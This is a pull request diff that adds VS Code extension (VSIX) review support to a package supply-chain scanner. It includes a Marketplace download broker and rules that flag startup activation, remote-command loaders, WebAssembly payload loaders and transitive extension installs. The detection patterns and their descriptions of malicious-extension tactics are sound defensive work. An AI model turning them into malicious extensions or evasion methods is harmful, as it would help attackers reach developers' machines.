### PR TITLE
Add VS Code extension workflow gate support

### DIFF
--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -17,7 +17,7 @@ Hono Worker
   └─ constrained brokers/gateways for registry/artifact downloads
         │
         ▼
-      npm registry, PyPI, GitHub Actions artifacts
+      npm registry, PyPI, VS Code Marketplace, GitHub Actions artifacts
 
 Dynamic Worker sandbox
   ├─ receives scan options and artifact URLs, not npm credentials
@@ -38,7 +38,7 @@ The Worker is the trusted control plane; the sandbox treats package bytes as hos
 
 ## Sandbox parser
 
-Archive parsing is shared by the sandbox and tests rather than copied as strings. Tar parsing lives in `server/lib/tar-parser.js`; ZIP wheel parsing is covered by `test/zip-parser.test.mjs`; shared fixture writers live in `test/helpers/archive-fixtures.mjs`. The parser enforces path safety, file-count and expansion caps, unsupported-entry reporting, duplicate-path handling, and fail-closed behavior. Tarballs are parsed as a stream: entry bodies beyond the retention budget (`SANDBOX_MAX_TAR_BYTES`) — typically prepackaged platform binaries — are skipped rather than buffered, recorded as `content-skipped` files/findings with path and size only, under a total stream cap (`SANDBOX_MAX_STREAM_TAR_BYTES`). `pnpm run fuzz` scales the archive-parser property suite for deeper exploration.
+Archive parsing is shared by the sandbox and tests rather than copied as strings. Tar parsing lives in `server/lib/tar-parser.js`; ZIP wheel/VSIX parsing is covered by `test/zip-parser.test.mjs` and adapter tests; shared fixture writers live in `test/helpers/archive-fixtures.mjs`. The parser enforces path safety, file-count and expansion caps, unsupported-entry reporting, duplicate-path handling, and fail-closed behavior. Tarballs are parsed as a stream: entry bodies beyond the retention budget (`SANDBOX_MAX_TAR_BYTES`) — typically prepackaged platform binaries — are skipped rather than buffered, recorded as `content-skipped` files/findings with path and size only, under a total stream cap (`SANDBOX_MAX_STREAM_TAR_BYTES`). `pnpm run fuzz` scales the archive-parser property suite for deeper exploration.
 
 ## Scan pipeline
 

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -13,7 +13,7 @@ Hono Worker
   ├─ D1 persistence and R2 report/artifact storage
   ├─ Queue-backed scan/gate orchestration
   ├─ Dynamic Worker loader for untrusted archive parsing
-  ├─ npm / PyPI adapters and workflow-gate adapters
+  ├─ npm / PyPI / VS Code adapters and workflow-gate adapters
   └─ constrained brokers/gateways for registry/artifact downloads
         │
         ▼
@@ -22,7 +22,7 @@ Hono Worker
 Dynamic Worker sandbox
   ├─ receives scan options and artifact URLs, not npm credentials
   ├─ fetches only through `globalOutbound` brokers/gateways
-  ├─ parses tarballs and wheels safely
+  ├─ parses tarballs, wheels, and VSIX artifacts safely
   └─ returns bounded file metadata, text evidence, and suspicious-entry flags
 ```
 
@@ -34,7 +34,7 @@ The Worker is the trusted control plane; the sandbox treats package bytes as hos
 - **Parent Worker** — authenticates users, resolves the organization, checks ownership, decrypts credentials only at the moment of registry use, invokes the sandbox, computes findings/risk, persists reports, and emits redacted audit events.
 - **Dynamic Worker sandbox** — parses untrusted archive bytes. It must not execute code, install dependencies, resolve imports, run build steps, or receive token material.
 - **NpmStageGateway** — the only place npm authorization is attached. Allowed npm egress is staged tarball fetch, package metadata JSON, and previous-version `.tgz` downloads needed for diffing.
-- **PyPiBroker / GitHub artifact broker** — credential-free PyPI artifact downloads are restricted to `https://files.pythonhosted.org`; GitHub artifact access is scoped to the workflow-gate installation/run being reviewed.
+- **PyPiBroker / VscodeBroker / GitHub artifact broker** — credential-free PyPI artifact downloads are restricted to `https://files.pythonhosted.org`; VSIX baseline downloads are restricted to allowed Marketplace/CDN hosts; GitHub artifact access is scoped to the workflow-gate installation/run being reviewed.
 
 ## Sandbox parser
 

--- a/docs/workflow-gates.md
+++ b/docs/workflow-gates.md
@@ -2,7 +2,7 @@
 
 Workflow gates are Drydock's review mode for releases whose registry cannot hold a private staged artifact. GitHub Actions builds the release, uploads the candidate artifacts, and a GitHub Environment custom deployment-protection rule pauses publishing while Drydock reviews the bytes.
 
-Supported gate ecosystems: **PyPI** and **npm**. Shared GitHub plumbing lives in `server/lib/workflow-gates/`; artifact-specific behavior lives behind adapters.
+Supported gate ecosystems: **PyPI**, **npm**, and **VS Code extensions**. Shared GitHub plumbing lives in `server/lib/workflow-gates/`; artifact-specific behavior lives behind adapters.
 
 ## Core contract
 
@@ -34,7 +34,7 @@ A release set is the boundary between CI and Drydock. Drydock never trusts a mai
 
 For every candidate artifact set, adapters must provide:
 
-- package/project identity and version;
+- package/project/extension identity and version;
 - ecosystem and artifact kind;
 - normalized file list and hashes;
 - current candidate bytes;
@@ -106,6 +106,41 @@ See [`pypi-workflow-gate.md`](./pypi-workflow-gate.md) for the PyPI-specific
 workflow shape, including build-time `SHA256SUMS` generation and publish-time
 verification.
 
+## VS Code workflow-gate notes
+
+VS Code extension gates review uploaded `.vsix` artifacts before a workflow publishes them to the Marketplace. Identity is derived from `extension/package.json` inside the VSIX as `publisher.name` plus `version`.
+
+The VS Code adapter (`server/lib/adapters/vscode/`):
+
+- accepts `.vsix` artifacts and parses them through the shared ZIP sandbox;
+- strips the VSIX `extension/` payload prefix before deterministic review;
+- requires a constrained `engines.vscode` value and safe extension identity fields;
+- groups by extension id and requires a single VSIX per extension release;
+- resolves a best-effort baseline from the public VS Code Marketplace and downloads only allowed Marketplace or `*.gallerycdn.vsassets.io` VSIX assets without credentials;
+- reports metadata mismatches, broad startup activation, startup remote-command loaders, startup WebAssembly loaders, undeclared configuration reads, and transitive extension installs.
+
+Recommended workflow shape:
+
+```yaml
+jobs:
+  package:
+    steps:
+      - run: npm ci
+      - run: npx @vscode/vsce package --out dist/extension.vsix
+      - uses: actions/upload-artifact@v4
+        with:
+          name: vscode-release-candidate
+          path: dist/*.vsix
+  publish:
+    needs: package
+    environment: production
+    steps:
+      - uses: actions/download-artifact@v4
+      - run: npx @vscode/vsce publish --packagePath dist/*.vsix
+```
+
+The publish job must publish the reviewed VSIX bytes. Repacking after approval breaks the review boundary.
+
 ## Trust and failure behavior
 
 - The GitHub webhook signature is mandatory.
@@ -143,4 +178,4 @@ byte-continuity loop without trusting any single step.
 ## Remaining work
 
 - Expand gate-specific e2e coverage as more ecosystems are added.
-- Keep GitHub/PyPI/npm validation failures user-actionable without leaking credentials or private package bytes.
+- Keep GitHub/PyPI/npm/VS Code validation failures user-actionable without leaking credentials or private package bytes.

--- a/docs/workflow-gates.md
+++ b/docs/workflow-gates.md
@@ -32,6 +32,8 @@ Required bindings/secrets include the GitHub App id/private key/client credentia
 
 A release set is the boundary between CI and Drydock. Drydock never trusts a maintainer-declared manifest as authority over reviewed bytes; it recomputes identity and digest evidence from the uploaded artifacts themselves.
 
+Package identity and version come from each artifact's own metadata: wheel `METADATA`, sdist `PKG-INFO`, npm `package.json`, or VSIX `extension/package.json` (`publisher.name` + `version`). Every artifact must expose a package identity and version; files are grouped by normalized package name where the ecosystem has one, and artifacts that share a name must agree on the version. Distinct package names are separate releases, which is the expected monorepo shape.
+
 For every candidate artifact set, adapters must provide:
 
 - package/project/extension identity and version;

--- a/docs/workflow-gates.md
+++ b/docs/workflow-gates.md
@@ -118,7 +118,8 @@ The VS Code adapter (`server/lib/adapters/vscode/`):
 - strips the VSIX `extension/` payload prefix before deterministic review;
 - requires a constrained `engines.vscode` value and safe extension identity fields;
 - groups by extension id and requires a single VSIX per extension release;
-- resolves a best-effort baseline from the public VS Code Marketplace and downloads only allowed Marketplace or `*.gallerycdn.vsassets.io` VSIX assets without credentials;
+- resolves a best-effort baseline from the public VS Code Marketplace, then downloads only allowed Marketplace or `*.gallerycdn.vsassets.io` VSIX assets without credentials;
+- treats Marketplace baseline lookup as a diff aid only: metadata, download, parse, or identity failures degrade to a no-baseline review;
 - reports metadata mismatches, broad startup activation, startup remote-command loaders, startup WebAssembly loaders, undeclared configuration reads, and transitive extension installs.
 
 Recommended workflow shape:

--- a/server/lib/adapters/types.ts
+++ b/server/lib/adapters/types.ts
@@ -36,7 +36,7 @@ export interface AcquiredArtifact {
 // Opaque to the pipeline — the adapter is the only thing that interprets it.
 export type StagedDetails = unknown;
 
-export type ReleaseProvenanceArtifactKind = "tarball" | "wheel" | "sdist";
+export type ReleaseProvenanceArtifactKind = "tarball" | "wheel" | "sdist" | "vsix";
 
 // One reviewed release artifact bound to the SHA-256 the control plane
 // recomputed from its immutable bytes.
@@ -53,7 +53,7 @@ export interface ReleaseProvenanceArtifact {
 // uniformly across ecosystems in the report "Provenance" section and surfaced in
 // the report export so a maintainer's CI can verify against it.
 export interface ReleaseProvenance {
-  ecosystem: "npm" | "pypi";
+  ecosystem: "npm" | "pypi" | "vscode";
   mode: "workflow_gate";
   artifacts: ReleaseProvenanceArtifact[];
 }

--- a/server/lib/adapters/vscode/broker.ts
+++ b/server/lib/adapters/vscode/broker.ts
@@ -1,0 +1,211 @@
+import type { DownloadResult } from "../../sandbox";
+import type { AdapterBroker, AdapterConnectionRef, AdapterContext } from "../types";
+
+const MARKETPLACE_EXTENSION_QUERY =
+  "https://marketplace.visualstudio.com/_apis/public/gallery/extensionquery?api-version=7.2-preview.1";
+const MARKETPLACE_VSIX_ASSET_TYPE = "Microsoft.VisualStudio.Services.VSIXPackage";
+const MARKETPLACE_QUERY_FLAGS = 1 | 2 | 128; // IncludeVersions | IncludeFiles | IncludeAssetUri
+
+export interface VscodeMarketplaceVersion {
+  version: string;
+  lastUpdated: string | null;
+  files: VscodeMarketplaceFile[];
+}
+
+export interface VscodeMarketplaceFile {
+  assetType: string | null;
+  source: string | null;
+}
+
+export interface VscodeBrokerDownloadOptions {
+  maxFiles?: number;
+}
+
+export interface VscodePublicArtifactRef {
+  url: string;
+}
+
+export interface VscodeBroker extends AdapterBroker {
+  fetchExtensionVersions(extensionId: string): Promise<VscodeMarketplaceVersion[] | null>;
+  downloadPublicArtifact(
+    artifact: VscodePublicArtifactRef,
+    opts?: VscodeBrokerDownloadOptions,
+  ): Promise<DownloadResult>;
+}
+
+export function createVscodeBroker(ctx: AdapterContext, _ref: AdapterConnectionRef): VscodeBroker {
+  return {
+    async fetchExtensionVersions(extensionId: string): Promise<VscodeMarketplaceVersion[] | null> {
+      const [publisher, extensionName] = extensionId.split(".");
+      if (!publisher || !extensionName) return null;
+      try {
+        const res = await fetch(MARKETPLACE_EXTENSION_QUERY, {
+          method: "POST",
+          headers: {
+            accept: "application/json;api-version=7.2-preview.1",
+            "content-type": "application/json",
+          },
+          body: JSON.stringify({
+            filters: [
+              {
+                criteria: [{ filterType: 7, value: extensionId }],
+              },
+            ],
+            flags: MARKETPLACE_QUERY_FLAGS,
+          }),
+        });
+        if (!res.ok) return null;
+        const data = (await res.json()) as unknown;
+        const extension = findMarketplaceExtension(data, publisher, extensionName);
+        return extension?.versions ?? null;
+      } catch {
+        return null;
+      }
+    },
+
+    async downloadPublicArtifact(
+      artifact: VscodePublicArtifactRef,
+      opts?: VscodeBrokerDownloadOptions,
+    ): Promise<DownloadResult> {
+      if (!isAllowedVscodeArtifactUrl(artifact.url)) {
+        throw new Error("VS Code Marketplace artifact URL is not allowed");
+      }
+      const { downloadInSandbox } = await import("../../sandbox");
+      return downloadInSandbox(ctx.env, ctx.executionCtx, {
+        tarballUrl: artifact.url,
+        archiveFormat: "zip",
+        publicArtifactUrls: [artifact.url],
+        maxFiles: opts?.maxFiles,
+      });
+    },
+
+    dispose(): void {},
+  };
+}
+
+export function pickVscodeBaselineVersion(
+  versions: VscodeMarketplaceVersion[] | null | undefined,
+  candidateVersion: string,
+): { version: string; url: string; reason: string } | null {
+  const candidates = (versions ?? [])
+    .filter((version) => version.version && version.version !== candidateVersion)
+    .map((version, index) => ({
+      version: version.version,
+      url: vscodeVsixAssetUrl(version),
+      lastUpdatedMs: parseTimestamp(version.lastUpdated),
+      index,
+    }))
+    .filter((version): version is typeof version & { url: string } => Boolean(version.url));
+  if (!candidates.length) return null;
+
+  const byTime = candidates
+    .filter((version) => version.lastUpdatedMs > 0)
+    .sort((a, b) => b.lastUpdatedMs - a.lastUpdatedMs)[0];
+  if (byTime) {
+    return {
+      version: byTime.version,
+      url: byTime.url,
+      reason: "newest-marketplace-version",
+    };
+  }
+
+  const first = candidates.sort((a, b) => a.index - b.index)[0];
+  return {
+    version: first.version,
+    url: first.url,
+    reason: "marketplace-version-order",
+  };
+}
+
+export function vscodeVsixAssetUrl(version: VscodeMarketplaceVersion): string | null {
+  for (const file of version.files) {
+    if (file.assetType !== MARKETPLACE_VSIX_ASSET_TYPE || !file.source) continue;
+    return isAllowedVscodeArtifactUrl(file.source) ? file.source : null;
+  }
+  return null;
+}
+
+export function isAllowedVscodeArtifactUrl(url: string): boolean {
+  try {
+    const parsed = new URL(url);
+    const host = parsed.hostname.toLowerCase();
+    if (parsed.protocol !== "https:") return false;
+    if (host === "marketplace.visualstudio.com") {
+      return parsed.pathname.startsWith("/_apis/public/gallery/");
+    }
+    return host === "gallerycdn.vsassets.io" || host.endsWith(".gallerycdn.vsassets.io");
+  } catch {
+    return false;
+  }
+}
+
+function findMarketplaceExtension(
+  value: unknown,
+  publisher: string,
+  extensionName: string,
+): { versions: VscodeMarketplaceVersion[] } | null {
+  if (!isRecord(value) || !Array.isArray(value.results)) return null;
+  for (const result of value.results) {
+    if (!isRecord(result) || !Array.isArray(result.extensions)) continue;
+    for (const extension of result.extensions) {
+      const parsed = parseMarketplaceExtension(extension);
+      if (!parsed) continue;
+      if (
+        parsed.publisher.toLowerCase() === publisher.toLowerCase() &&
+        parsed.extensionName.toLowerCase() === extensionName.toLowerCase()
+      ) {
+        return { versions: parsed.versions };
+      }
+    }
+  }
+  return null;
+}
+
+function parseMarketplaceExtension(value: unknown): {
+  publisher: string;
+  extensionName: string;
+  versions: VscodeMarketplaceVersion[];
+} | null {
+  if (!isRecord(value)) return null;
+  const publisherRecord = isRecord(value.publisher) ? value.publisher : {};
+  const publisher =
+    typeof publisherRecord.publisherName === "string" ? publisherRecord.publisherName : "";
+  const extensionName = typeof value.extensionName === "string" ? value.extensionName : "";
+  if (!publisher || !extensionName || !Array.isArray(value.versions)) return null;
+  return {
+    publisher,
+    extensionName,
+    versions: value.versions.map(parseMarketplaceVersion).filter((version) => version !== null),
+  };
+}
+
+function parseMarketplaceVersion(value: unknown): VscodeMarketplaceVersion | null {
+  if (!isRecord(value)) return null;
+  const version = typeof value.version === "string" ? value.version : "";
+  if (!version) return null;
+  return {
+    version,
+    lastUpdated: typeof value.lastUpdated === "string" ? value.lastUpdated : null,
+    files: Array.isArray(value.files)
+      ? value.files.map(parseMarketplaceFile).filter((file) => file !== null)
+      : [],
+  };
+}
+
+function parseMarketplaceFile(value: unknown): VscodeMarketplaceFile | null {
+  if (!isRecord(value)) return null;
+  return {
+    assetType: typeof value.assetType === "string" ? value.assetType : null,
+    source: typeof value.source === "string" ? value.source : null,
+  };
+}
+
+function parseTimestamp(value: string | null): number {
+  if (!value) return 0;
+  const timestamp = Date.parse(value);
+  return Number.isFinite(timestamp) ? timestamp : 0;
+}
+
+function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}

--- a/server/lib/adapters/vscode/broker.ts
+++ b/server/lib/adapters/vscode/broker.ts
@@ -87,6 +87,9 @@ export function pickVscodeBaselineVersion(
   versions: VscodeMarketplaceVersion[] | null | undefined,
   candidateVersion: string,
 ): { version: string; url: string; reason: string } | null {
+  const candidateLastUpdatedMs = parseTimestamp(
+    (versions ?? []).find((version) => version.version === candidateVersion)?.lastUpdated ?? null,
+  );
   const candidates = (versions ?? [])
     .filter((version) => version.version && version.version !== candidateVersion)
     .map((version, index) => ({
@@ -95,6 +98,10 @@ export function pickVscodeBaselineVersion(
       lastUpdatedMs: parseTimestamp(version.lastUpdated),
       index,
     }))
+    .filter((version) => {
+      if (candidateLastUpdatedMs <= 0) return true;
+      return version.lastUpdatedMs > 0 && version.lastUpdatedMs < candidateLastUpdatedMs;
+    })
     .filter((version): version is typeof version & { url: string } => Boolean(version.url));
   if (!candidates.length) return null;
 

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -379,7 +379,12 @@ function normalizePathSegments(path: string): string | null {
 }
 
 function broadActivationEvent(events: string[]): string | null {
-  return events.find((event) => event === "*" || event === "onStartupFinished") ?? null;
+  return (
+    events.find(
+      (event) =>
+        event === "*" || event === "onStartupFinished" || event.startsWith("workspaceContains:"),
+    ) ?? null
+  );
 }
 
 function matches(patterns: RegExp[], sample: string, normalized: string): boolean {

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -1,0 +1,272 @@
+import {
+  deterministicFindings,
+  packageJsonDiffFindings,
+  type DiffEntry,
+  type Finding,
+  type PackageJsonDiff,
+} from "../../review";
+import { firstJsonPropertyLine } from "../../review-rules/helpers";
+import { JS_PATTERN_SET } from "../../review-rules/patterns";
+import { normalizeCodeForScanning } from "../../review-rules/normalize";
+import { firstMatchingLine } from "../../text-utils";
+import type { AcquiredArtifact } from "../types";
+import {
+  extensionIdFromManifest,
+  findVscodeManifestFile,
+  parseVscodeExtensionManifest,
+} from "./manifest";
+import {
+  VSCODE_RULE_IDS,
+  VSCODE_RULES_VERSION,
+  type VscodeAdapterDetails,
+  type VscodeExtensionManifest,
+} from "./types";
+
+const COMMON_VSCODE_CONFIGURATION_NAMESPACES = new Set([
+  "breadcrumbs",
+  "css",
+  "debug",
+  "diffEditor",
+  "editor",
+  "emmet",
+  "explorer",
+  "extensions",
+  "files",
+  "git",
+  "github",
+  "html",
+  "javascript",
+  "json",
+  "markdown",
+  "npm",
+  "scm",
+  "search",
+  "security",
+  "terminal",
+  "typescript",
+  "window",
+  "workbench",
+]);
+
+export function buildVscodeFindings(args: {
+  staged: AcquiredArtifact;
+  details: VscodeAdapterDetails;
+  fileDiff: DiffEntry[];
+  manifestDiff: PackageJsonDiff;
+  stagedManifestText: string | null;
+}): Finding[] {
+  const extensionManifest = parseVscodeExtensionManifest(args.staged.files).manifest;
+  return [
+    ...deterministicFindings(args.staged.files, args.fileDiff, args.staged.manifest, {
+      codePatternSet: "javascript",
+    }),
+    ...packageJsonDiffFindings(args.manifestDiff, args.stagedManifestText),
+    ...vscodeManifestFindings(args.details, extensionManifest, args.staged.files),
+  ];
+}
+
+function vscodeManifestFindings(
+  details: VscodeAdapterDetails,
+  manifest: VscodeExtensionManifest,
+  files: AcquiredArtifact["files"],
+): Finding[] {
+  const findings: Finding[] = [];
+  const packageJsonFile = findVscodeManifestFile(files);
+  const extensionId = extensionIdFromManifest(manifest);
+  const mismatches: string[] = [];
+  if (details.manifest.package !== extensionId) {
+    mismatches.push(`manifest package ${details.manifest.package} != package.json ${extensionId}`);
+  }
+  if (details.manifest.version !== manifest.version) {
+    mismatches.push(
+      `manifest version ${details.manifest.version} != package.json ${manifest.version}`,
+    );
+  }
+  if (mismatches.length) {
+    findings.push(
+      vscodeTag("metadataMismatch", {
+        severity: "critical",
+        file: "package.json",
+        evidence: mismatches.join("; "),
+        reason:
+          "the reviewed VSIX identity does not match its extension manifest, so the release target cannot be trusted",
+      }),
+    );
+  }
+
+  const broadActivation = broadActivationEvent(manifest.activationEvents);
+  if (broadActivation) {
+    findings.push(
+      vscodeTag("broadActivation", {
+        severity: "high",
+        file: "package.json",
+        line: firstJsonPropertyLine(
+          packageJsonFile?.textSample,
+          "activationEvents",
+          broadActivation,
+        ),
+        evidence: `activationEvents includes ${broadActivation}`,
+        reason:
+          "broad VS Code activation runs extension code at startup or workspace open, before a user invokes a narrow feature",
+      }),
+    );
+  }
+
+  const remoteCommandFinding = startupRemoteCommandFinding(manifest, files, broadActivation);
+  if (remoteCommandFinding) findings.push(remoteCommandFinding);
+
+  findings.push(...undeclaredConfigurationReadFindings(manifest, files));
+
+  if (manifest.extensionDependencies.length) {
+    findings.push(
+      vscodeTag("extensionDependency", {
+        severity: "medium",
+        file: "package.json",
+        line: firstJsonPropertyLine(packageJsonFile?.textSample, "extensionDependencies"),
+        evidence: `extensionDependencies: ${manifest.extensionDependencies.join(", ")}`,
+        reason:
+          "extension dependencies are installed and activated transitively, a delivery path abused by malicious extension campaigns",
+      }),
+    );
+  }
+  if (manifest.extensionPack.length) {
+    findings.push(
+      vscodeTag("extensionDependency", {
+        severity: "low",
+        file: "package.json",
+        line: firstJsonPropertyLine(packageJsonFile?.textSample, "extensionPack"),
+        evidence: `extensionPack: ${manifest.extensionPack.join(", ")}`,
+        reason:
+          "extension packs install additional extensions transitively, so reviewers should confirm every packed extension is intended",
+      }),
+    );
+  }
+
+  return findings;
+}
+
+function startupRemoteCommandFinding(
+  manifest: VscodeExtensionManifest,
+  files: AcquiredArtifact["files"],
+  broadActivation: string | null,
+): Finding | null {
+  if (!broadActivation) return null;
+  const entrypoint = entrypointFile(manifest, files);
+  if (!entrypoint?.textSample) return null;
+  const sample = entrypoint.textSample;
+  const normalized = normalizeCodeForScanning(sample);
+  const processExecution = matches(JS_PATTERN_SET.processExecution, sample, normalized);
+  const networkAccess = matches(JS_PATTERN_SET.networkAccess, sample, normalized);
+  const dynamicEvaluation = matches(JS_PATTERN_SET.dynamicEvaluation, sample, normalized);
+  if (!processExecution || !networkAccess || !dynamicEvaluation) return null;
+  return vscodeTag("startupRemoteCommand", {
+    severity: "critical",
+    file: entrypoint.path,
+    line: firstMatchingLine(sample, [
+      ...JS_PATTERN_SET.processExecution,
+      ...JS_PATTERN_SET.networkAccess,
+      ...JS_PATTERN_SET.dynamicEvaluation,
+    ]),
+    evidence: `startup activation ${broadActivation} reaches network + decode/eval + process execution`,
+    reason:
+      "remote-command VS Code malware commonly activates on startup, fetches or decodes operator-controlled payloads, and executes shell commands",
+  });
+}
+
+function undeclaredConfigurationReadFindings(
+  manifest: VscodeExtensionManifest,
+  files: AcquiredArtifact["files"],
+): Finding[] {
+  const declared = new Set(manifest.configurationProperties);
+  const findings: Finding[] = [];
+  for (const file of files) {
+    if (!/\.[cm]?[jt]sx?$/.test(file.path) || !file.textSample) continue;
+    for (const key of readConfigurationKeys(file.textSample)) {
+      if (isDeclaredConfigurationKey(key, declared) || isCommonConfigurationKey(key)) continue;
+      findings.push(
+        vscodeTag("undeclaredConfigurationRead", {
+          severity: "high",
+          file: file.path,
+          line: firstMatchingLine(file.textSample, [configurationKeyLinePattern(key)]),
+          evidence: `reads undeclared VS Code configuration ${key}`,
+          reason:
+            "undeclared extension configuration can be pre-seeded through workspace settings and used as an operator-controlled input without appearing in the manifest",
+        }),
+      );
+    }
+  }
+  return findings;
+}
+
+function readConfigurationKeys(sample: string): string[] {
+  const keys = new Set<string>();
+  const chained =
+    /(?:vscode\.)?workspace\.getConfiguration\s*\(\s*["']([^"']+)["']\s*\)\s*\.get\s*\(\s*["']([^"']+)["']/g;
+  const direct = /(?:vscode\.)?workspace\.getConfiguration\s*\(\s*["']([^"']+\.[^"']+)["']\s*\)/g;
+  let match: RegExpExecArray | null;
+  while ((match = chained.exec(sample))) keys.add(`${match[1]}.${match[2]}`);
+  while ((match = direct.exec(sample))) keys.add(match[1]);
+  return [...keys].sort();
+}
+
+function configurationKeyLinePattern(key: string): RegExp {
+  const [namespace, leaf] = key.split(/\.(.*)/s);
+  return new RegExp(
+    `workspace\\.getConfiguration\\s*\\(\\s*["']${escapeRegExp(namespace)}(?:\\.${escapeRegExp(
+      leaf ?? "",
+    )})?["']`,
+  );
+}
+
+function isDeclaredConfigurationKey(key: string, declared: Set<string>): boolean {
+  return declared.has(key);
+}
+
+function isCommonConfigurationKey(key: string): boolean {
+  const namespace = key.split(".")[0];
+  return COMMON_VSCODE_CONFIGURATION_NAMESPACES.has(namespace);
+}
+
+function entrypointFile(
+  manifest: Pick<VscodeExtensionManifest, "main" | "browser">,
+  files: AcquiredArtifact["files"],
+) {
+  const candidates = [
+    ...entrypointCandidates(manifest.main),
+    ...entrypointCandidates(manifest.browser),
+  ];
+  return candidates.map((path) => files.find((file) => file.path === path)).find(Boolean) ?? null;
+}
+
+function entrypointCandidates(path: string | null): string[] {
+  if (!path) return [];
+  const normalized = path.replace(/^\.\//, "");
+  const out = [normalized];
+  if (!/\.[cm]?js$/i.test(normalized))
+    out.push(`${normalized}.js`, `${normalized}.cjs`, `${normalized}.mjs`);
+  return out;
+}
+
+function broadActivationEvent(events: string[]): string | null {
+  return events.find((event) => event === "*" || event === "onStartupFinished") ?? null;
+}
+
+function matches(patterns: RegExp[], sample: string, normalized: string): boolean {
+  return patterns.some((pattern) => {
+    pattern.lastIndex = 0;
+    const raw = pattern.test(sample);
+    pattern.lastIndex = 0;
+    return raw || pattern.test(normalized);
+  });
+}
+
+function vscodeTag(
+  rule: keyof typeof VSCODE_RULE_IDS,
+  finding: Omit<Finding, "ruleId" | "ruleVersion">,
+): Finding {
+  return { ...finding, ruleId: VSCODE_RULE_IDS[rule], ruleVersion: VSCODE_RULES_VERSION };
+}
+
+function escapeRegExp(value: string): string {
+  return value.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+}

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -286,7 +286,9 @@ function configurationKeyLinePattern(key: string): RegExp {
 }
 
 function isDeclaredConfigurationKey(key: string, declared: Set<string>): boolean {
-  return declared.has(key);
+  // A section-scoped read like getConfiguration("myExt.section") is declared
+  // when any contributed property lives under that section.
+  return declared.has(key) || [...declared].some((property) => property.startsWith(`${key}.`));
 }
 
 function isCommonConfigurationKey(key: string): boolean {

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -48,6 +48,13 @@ const COMMON_VSCODE_CONFIGURATION_NAMESPACES = new Set([
   "workbench",
 ]);
 
+const WASM_LOADER_PATTERNS = [
+  /\bWebAssembly\.(?:compile|compileStreaming|instantiate|instantiateStreaming)\s*\(/,
+  /\bnew\s+Go\s*\(/,
+  /\bgo\.run\s*\(/,
+  /\bwasm_exec(?:\.js)?\b/,
+];
+
 export function buildVscodeFindings(args: {
   staged: AcquiredArtifact;
   details: VscodeAdapterDetails;
@@ -114,6 +121,9 @@ function vscodeManifestFindings(
 
   const remoteCommandFinding = startupRemoteCommandFinding(manifest, files, broadActivation);
   if (remoteCommandFinding) findings.push(remoteCommandFinding);
+
+  const wasmLoaderFinding = startupWasmLoaderFinding(files, broadActivation);
+  if (wasmLoaderFinding) findings.push(wasmLoaderFinding);
 
   findings.push(...undeclaredConfigurationReadFindings(manifest, files));
 
@@ -196,6 +206,39 @@ function undeclaredConfigurationReadFindings(
     }
   }
   return findings;
+}
+
+function startupWasmLoaderFinding(
+  files: AcquiredArtifact["files"],
+  broadActivation: string | null,
+): Finding | null {
+  if (!broadActivation || !hasWasmArtifact(files)) return null;
+  const loader = files.find((file) => isJavaScriptFile(file.path) && isWasmLoader(file.textSample));
+  if (!loader?.textSample) return null;
+  return vscodeTag("startupWasmLoader", {
+    severity: "critical",
+    file: loader.path,
+    line: firstMatchingLine(loader.textSample, WASM_LOADER_PATTERNS),
+    evidence: `startup activation ${broadActivation} loads a bundled WebAssembly payload`,
+    reason:
+      "startup-loaded VS Code WebAssembly payloads can hide network and process behavior inside an opaque module",
+  });
+}
+
+function hasWasmArtifact(files: AcquiredArtifact["files"]): boolean {
+  return files.some((file) => /\.wasm$/i.test(file.path));
+}
+
+function isJavaScriptFile(path: string): boolean {
+  return /\.[cm]?jsx?$/.test(path);
+}
+
+function isWasmLoader(sample: string | undefined): boolean {
+  if (!sample) return false;
+  return WASM_LOADER_PATTERNS.some((pattern) => {
+    pattern.lastIndex = 0;
+    return pattern.test(sample);
+  });
 }
 
 function readConfigurationKeys(sample: string): string[] {

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -122,7 +122,7 @@ function vscodeManifestFindings(
   const remoteCommandFinding = startupRemoteCommandFinding(manifest, files, broadActivation);
   if (remoteCommandFinding) findings.push(remoteCommandFinding);
 
-  const wasmLoaderFinding = startupWasmLoaderFinding(files, broadActivation);
+  const wasmLoaderFinding = startupWasmLoaderFinding(manifest, files, broadActivation);
   if (wasmLoaderFinding) findings.push(wasmLoaderFinding);
 
   findings.push(...undeclaredConfigurationReadFindings(manifest, files));
@@ -209,11 +209,14 @@ function undeclaredConfigurationReadFindings(
 }
 
 function startupWasmLoaderFinding(
+  manifest: VscodeExtensionManifest,
   files: AcquiredArtifact["files"],
   broadActivation: string | null,
 ): Finding | null {
   if (!broadActivation || !hasWasmArtifact(files)) return null;
-  const loader = files.find((file) => isJavaScriptFile(file.path) && isWasmLoader(file.textSample));
+  const loader = entrypointFiles(manifest, files).find(
+    (file) => isJavaScriptFile(file.path) && isWasmLoader(file.textSample),
+  );
   if (!loader?.textSample) return null;
   return vscodeTag("startupWasmLoader", {
     severity: "critical",
@@ -274,11 +277,25 @@ function entrypointFile(
   manifest: Pick<VscodeExtensionManifest, "main" | "browser">,
   files: AcquiredArtifact["files"],
 ) {
+  return entrypointFiles(manifest, files)[0] ?? null;
+}
+
+function entrypointFiles(
+  manifest: Pick<VscodeExtensionManifest, "main" | "browser">,
+  files: AcquiredArtifact["files"],
+) {
   const candidates = [
     ...entrypointCandidates(manifest.main),
     ...entrypointCandidates(manifest.browser),
   ];
-  return candidates.map((path) => files.find((file) => file.path === path)).find(Boolean) ?? null;
+  const seen = new Set<string>();
+  return candidates
+    .map((path) => files.find((file) => file.path === path))
+    .filter((file): file is AcquiredArtifact["files"][number] => {
+      if (!file || seen.has(file.path)) return false;
+      seen.add(file.path);
+      return true;
+    });
 }
 
 function entrypointCandidates(path: string | null): string[] {

--- a/server/lib/adapters/vscode/findings.ts
+++ b/server/lib/adapters/vscode/findings.ts
@@ -161,26 +161,28 @@ function startupRemoteCommandFinding(
   broadActivation: string | null,
 ): Finding | null {
